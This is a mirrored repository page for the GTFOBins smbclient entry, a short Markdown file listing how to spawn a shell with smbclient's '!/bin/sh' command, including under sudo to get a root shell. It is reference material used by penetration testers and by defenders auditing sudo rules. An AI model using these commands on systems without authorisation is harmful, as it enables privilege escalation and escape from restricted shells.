1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-10-18 13:28:51 +02:00
GTFOBins.github.io/_gtfobins/smbclient.md

13 lines
217 B
Markdown
Raw Normal View History

---
description: A valid SMB/CIFS server must be available.
functions:
2018-10-05 19:55:38 +02:00
shell:
- code: |
smbclient \\ip\share
!/bin/sh
2018-10-05 19:55:38 +02:00
sudo:
- code: |
sudo smbclient \\ip\share
!/bin/sh
---